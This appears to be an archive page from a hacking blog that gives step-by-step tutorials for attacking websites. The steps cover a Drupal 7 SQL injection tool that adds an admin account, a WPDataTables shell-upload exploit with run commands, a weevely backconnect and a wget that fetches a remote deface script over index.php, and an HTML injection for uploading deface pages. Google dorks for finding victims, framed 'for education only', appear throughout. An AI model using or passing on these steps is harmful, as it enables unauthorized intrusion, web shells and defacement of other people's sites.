Home Archives for Januari 2015

Minggu, 25 Januari 2015

Kamis, 22 Januari 2015

Drupal 7.xx SQL Injection Exploit

Drupal 7.xx SQL Injection Vulnerability
This exploit add a new Drupal administrator account (preserving original) via Sql Injection.

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.

Requirements:-
1). Python
2). Exploit Script.py
         OR
3). Drupal Auto Exploiter

In this tutorial, i'm just going to show you how to exploit using our Drupal Auto Exploiter since it is fast and easy.

Steps:-
1). Download the auto exploiter from the given link
2). Extract and run it
3).  Find your target on Google by using this dork
intext:"powered by drupal"
4). Choose any site, paste it in exploiter and click EXPLOIT
5). If the site is vulnerable, you will see something like this

6). Click the given login URL and login with the username and password given.

Having Problems?
Feel free to read the Frequent Asked Questions(FAQs) by clicking on HELP


Downloads:-



Read more

Wordpress Exploit: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass

Exploit Wordpress: WPDataTable Unauthenticated Shell Upload Vulnerability and Not Acceptable Bypass 

NOTE: THIS IS ONLY FOR EDUCATION PURPOSES, AND FOR SAFETY PURPOSE. WE ARE NOT RESPONSIBLE ANY HARM DONE BY YOU.


Uploading Shell

Requirement:
    1-Python Any Version (v2.7 recommended)
    2-Exploit Script
    3-Backdoor

Steps:
    1- Download Exploit
        wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt
    2- Change to executable Python extension
        mv wpdatatables_shell_up.py_.txt wpdatatables_shell_up.py
    3- Find Vulnerable Target using dork
        inurl:/plugins/wpdatatables
        inurl:codecanyon-3958969
        index of "wpdatatables"
        index of "codecanyon-3958969"
    4- Open cmd/terminal and run exploit wptable.py
        python wpdatatables_shell_up.py -t targetsite.com -f shell.php
    5- Shell Upload to
        http://targetsite.com/wp-content/YEAR/MONTH/shell.php

Bypassing Not Acceptable:-

Requirements:
    1- Weevely Stealth Shell
    2- Remote Deface Script (.txt)


Steps:
    1- Upload weevely stealth shell using the exploit script

    2- Backconnect using weevely

    3- CD to root directory

    4- Backup index.php
        mv index.php indexBAK.php
    5- Import Deface Script
        wget http://yourhosting.com/index.txt -O index.php
Read more

How to Install Social Engineering Toolkit (S.E.T.) on Windows

Hello Readers! Today Im gonna tech you guyz can Install Social Engineering Toolkit (S.E.T.) on Windows ..

How to Install Social Engineering Toolkit (S.E.T.) on Windows:-

  How to Install?
  • Download and extract S.E.T anywhere you want.
  • Download and install PyCrypto library based on your python version
  • Done and you're ready to go! :)
How to Run the scripts?

1). Open up your cmd, and cd to the S.E.T directory
cd\
cd set
2). Finally type in your cmd as below
python setoolkit
Downloads:-
Social Engineering Toolkit (40MB) / Mirror
PyCrypto

Read more

Chiangraientersoft HTML Injection Vulnerability





Hello Readers! today im gonna share a HTML Injection Vulnerability. This works most on Thailand web pages :). So lets start..

Chiangraientersoft HTML Injection Vulnerability:

1). Go to google and type any of the following dorks :-
inurl:Qread.php?id_ques=
inurl:webboard/Qread.php?id_ques=
Vulnerable at 'Qform.php' at Field Subject/Title
2). Pick any site!..and replace everything after yoursite.com/ with anyone of the following [Exploit] :
 /webboard/Qform.php
 /board/Qform.php
3). Just fill-up the forum and upload your deface page shell etc..
After your file is successfully uploaded, it would be listed at www.site.com/board/ or www.site.com/webboard/


Read more
Langganan: Postingan (Atom)